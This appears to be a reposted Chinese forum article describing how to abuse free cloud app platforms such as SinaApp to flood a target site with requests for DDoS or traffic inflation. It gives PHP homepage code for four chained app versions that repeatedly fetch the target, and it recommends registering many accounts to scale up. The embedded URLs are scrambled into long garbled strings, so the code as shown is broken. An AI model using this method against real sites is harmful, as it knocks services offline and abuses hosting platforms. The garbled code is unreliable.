-
-
黑客可利用云开发平台进行DDOS攻击
-
发表于:
2013-5-21 09:38
1192
-
说是DDOS攻击,实际上还可以用来刷流量和排名。估计这个想法很多大牛之前已经有想过,昨天在使用sinaapp时测试了下,貌似可行,所以和大家分享下。
大牛小牛应该都知道sinaapp、百度site app等都为开发者提供了很好的开放平台,注册也很简单。每个用户可以创建不同版本的app应用,攻击者可以利用该特点,注册大量用户,编写PHP代码对目标发起攻击,在测试过程中,我使用了一个帐号,创建了4个版本的APP进行测试,在自己站点上写了个记录访问者ip的文件作为被攻击者,效果不错,该记录文件每秒的容量暴涨(说明app访问被攻击者网站的频率很高)。下面看下测试步骤:
PS:主要使用sinaapp作为测试对象。
测试思路:创建4个版本的app.
版本1 主页代码如下:
file_get_contents('
ecfK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0u0Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6q4Q4c8e0S2Q4b7e0N6Q4b7e0k6Q4c8e0g2Q4z5p5k6Q4z5e0q4Q4c8e0k6Q4z5e0c8Q4b7V1u0Q4c8e0g2Q4z5o6N6Q4b7V1u0Q4x3U0S2Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1g2Q4c8e0N6Q4z5o6W2Q4z5o6S2Q4c8e0k6Q4z5f1y4Q4b7f1x3J5i4K6t1&6
?> file_get_contents('
b1cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0u0Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6q4Q4c8e0S2Q4b7e0N6Q4b7e0k6Q4c8e0g2Q4z5p5k6Q4z5e0q4Q4c8e0k6Q4z5e0c8Q4b7V1u0Q4c8e0g2Q4z5o6N6Q4b7V1u0Q4x3U0S2Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1g2Q4c8e0N6Q4z5o6W2Q4z5o6S2Q4c8e0k6Q4z5f1y4Q4b7f1x3J5i4K6t1&6
> file_get_contents('
72bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0u0Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6q4Q4c8e0S2Q4b7e0N6Q4b7e0k6Q4c8e0g2Q4z5p5k6Q4z5e0q4Q4c8e0k6Q4z5e0c8Q4b7V1u0Q4c8e0g2Q4z5o6N6Q4b7V1u0Q4x3U0S2Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1g2Q4c8e0N6Q4z5o6W2Q4z5o6S2Q4c8e0k6Q4z5f1y4Q4b7f1x3J5i4K6t1&6
>
版本2 主页代码:
file_get_contents('
1ecK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3W2H3i4K6u0W2M7r3S2H3i4K6t1%4i4K6t1&6i4K6y4m8i4K6u0r3i4K6u0r3i4@1f1$3i4K6V1@1i4@1u0n7i4@1f1#2i4K6R3%4i4@1u0n7i4@1f1%4i4K6W2n7i4@1q4q4i4@1f1$3i4@1p5H3i4K6R3%4
file_get_contents('
a66K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0y4Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6x3`.
?> file_get_contents('
0c2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3W2H3i4K6u0W2M7r3S2H3i4K6t1%4i4K6t1&6i4K6y4m8i4K6u0r3i4K6u0r3i4@1f1$3i4K6V1@1i4@1u0n7i4@1f1#2i4K6R3%4i4@1u0n7i4@1f1%4i4K6W2n7i4@1q4q4i4@1f1$3i4@1p5H3i4K6R3%4
file_get_contents('
da2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0y4Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6x3`.
> file_get_contents('
976K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3W2H3i4K6u0W2M7r3S2H3i4K6t1%4i4K6t1&6i4K6y4m8i4K6u0r3i4K6u0r3i4@1f1$3i4K6V1@1i4@1u0n7i4@1f1#2i4K6R3%4i4@1u0n7i4@1f1%4i4K6W2n7i4@1q4q4i4@1f1$3i4@1p5H3i4K6R3%4
file_get_contents('
b0fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0y4Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6x3`.
>
版本3 主页代码:
for ($i=1; $< for ($i=1; $< for ($i=1; $<=10; $i++){//这里邪恶了一下,多来几次效果更佳
file_get_contents('
694K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3W2H3i4K6u0W2M7r3S2H3i4K6t1%4i4K6t1&6i4K6y4n7
file_get_contents('
072K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0c8Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7R3`.`. }
>
版本4 主页代码:
file_get_contents('
702K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0u0Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7f1k6Q4b7V1y4Q4c8e0S2Q4z5o6N6Q4b7U0c8Q4c8e0k6Q4b7f1c8Q4b7V1u0Q4c8e0g2Q4b7V1g2Q4b7f1q4Q4c8e0N6Q4z5p5g2Q4b7f1j5`.
?> file_get_contents('
6b5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0u0Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7f1k6Q4b7V1y4Q4c8e0S2Q4z5o6N6Q4b7U0c8Q4c8e0k6Q4b7f1c8Q4b7V1u0Q4c8e0g2Q4b7V1g2Q4b7f1q4Q4c8e0N6Q4z5p5g2Q4b7f1j5`.
> file_get_contents('
138K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0u0Q4x3X3g2E0j5i4u0K6i4K6u0W2M7$3W2F1j5h3q4H3M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9K6b7W2)9J5c8W2)9J5c8W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4#2)9^5z5g2)9^5z5q4!0q4y4W2)9&6b7#2!0m8b7K6u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7f1k6Q4b7V1y4Q4c8e0S2Q4z5o6N6Q4b7U0c8Q4c8e0k6Q4b7f1c8Q4b7V1u0Q4c8e0g2Q4b7V1g2Q4b7f1q4Q4c8e0N6Q4z5p5g2Q4b7f1j5`.
>
以上是使用一个sinaapp用户进行攻击的步骤,可以自己扩展,注册大量用户及创建更多的版本进行攻击。但在测试过程中发现,每个APP实际上有两个IP出口。使用多个用户效果会更好。
PS:大家应该会有个疑问,为什么要创建版本4,这个我也是在实验中发现的,如果使用版本2和版本3直接互调,则达不到攻击的效果,版本2和版本3只访问被攻击目标一次旧停止了。有哪位大牛知道为什么的还请不惜赐教.
原文出自【比特网】,转载请保留原文链接:
9b8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5#2)9J5k6h3y4Z5K9h3&6S2j5Y4W2@1k6g2)9J5k6h3y4G2L8g2)9J5c8U0x3@1z5q4)9J5c8U0p5J5y4U0t1H3x3K6b7^5i4K6u0W2M7$3S2@1L8h3H3`.
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
